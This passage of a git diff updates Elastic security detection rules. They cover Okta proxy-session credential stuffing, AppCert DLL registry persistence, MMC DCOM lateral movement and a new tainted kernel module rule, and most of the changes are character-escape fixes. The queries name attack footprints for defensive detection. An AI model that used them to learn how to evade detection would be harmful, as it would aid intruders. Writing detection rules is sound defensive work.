may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n", + "query": "event.dataset:okta.system\n and not okta.actor.id:okta* and okta.debug_context.debug_data.dt_hash:*\n and okta.event_type:user.authentication* and okta.security_context.is_proxy:true\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.debug_context.debug_data.dt_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.security_context.is_proxy", + "type": "boolean" + } + ], + "risk_score": 47, + "rule_id": "50887ba8-7ff7-11ee-a038-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + }, + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.004", + "name": "Credential Stuffing", + "reference": "https://attack.mitre.org/techniques/T1110/004/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "okta.actor.id", + "value": 3 + } + ], + "field": [ + "okta.debug_context.debug_data.dt_hash" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 2 + }, + "id": "50887ba8-7ff7-11ee-a038-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json index 193ed153651..678d93fe96a 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json index 8984238a4cc..a89a6ce3ca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json index 37ca409d431..f9fb21f8361 100644 --- a/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json +++ b/packages/security_detection_engine/kibana/security_rule/51176ed2-2d90-49f2-9f3d-17196428b169_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json index f67694e7d78..cca65836d3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json index 8f51fdf8107..8a42378401a 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_102.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json index 445fc557dcf..0dfd7a52930 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_103.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json index fa6f85b9f6e..9483711b23b 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json index 08b0aed1591..264bfb1a4c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_105.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", "note": "", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json index 7276c36d120..ae874a7a4bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json index a266f5f62c3..1a2e0c86a6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json index c8415c5ce4d..0f8d70fc5e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json index 36dd250fae4..25ce0affaaf 100644 --- a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json +++ b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json index 1d1a4139254..74d75598728 100644 --- a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json +++ b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json new file mode 100644 index 00000000000..ae9684b43c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors the syslog log file for messages related to instances of a out-of-tree kernel module load, indicating the taining of the kernel. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Out-Of-Tree Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"loading out-of-tree module taints kernel.\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "51a09737-80f7-4551-a3be-dac8ef5d181a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "51a09737-80f7-4551-a3be-dac8ef5d181a_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json index 94c69f08f1b..32fa16c49cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json index edd83984994..6d78d6eaea7 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json index 5837c649a59..d35e838b210 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json index b881649dc2b..fdabef752ad 100644 --- 